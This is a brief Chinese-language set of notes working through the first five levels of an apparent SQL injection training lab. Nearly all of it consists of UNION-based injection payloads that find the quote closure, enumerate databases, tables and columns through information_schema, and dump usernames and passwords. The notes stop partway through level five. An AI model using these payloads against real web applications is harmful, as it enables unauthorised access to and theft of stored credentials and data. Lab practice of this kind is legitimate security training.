less-1
- 爆庫
id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata
–+#
- 爆表
?id=1222’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() – #
- 爆字段
—缺,下面有less-2 - 爆數據
?id=123’ union select 1,group_concat(username),group_concat(password) from users
–+#
查數據庫名–>查表名–>查字段名–>查數據
group_concat()函數的利用,使一個顯示位可爆多組數據
less-2
- and 1=2 無數據 判斷爲數字型注入
- 爆數據庫
?id=22222 union select 1,group_concat(schema_name),1 from information_schema.schemata
- 爆表
?id=22222 union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database()
- 爆字段
?id=22222 union select 1,group_concat(column_name),1 from information_schema.columns where table_name=‘uagents’
- 爆數據
?id=22222 union select 1,group_concat(uagent),group_concat(ip_address) from uagents
空的
less-3
- 題目提示輸入數據
- and 1=2,1=1無反應 ?id=1 ‘報錯
可看出來閉合爲’)
?id=3 ') – #
爆庫
?id=555 ') union select 1,2,group_concat(schema_name) from information_schema.schemata – #
less-4
嘗試:?id=1 ’ "
閉合 ")
?id=5555 ") union select database(),database(),user()-- #
爆此數據庫表
?id=5555 ") union select 1,1,group_concat(table_name) from information_schema.tables where table_schema = database() – #
less-5
?id=2’
‘閉合
但?id=2’ – #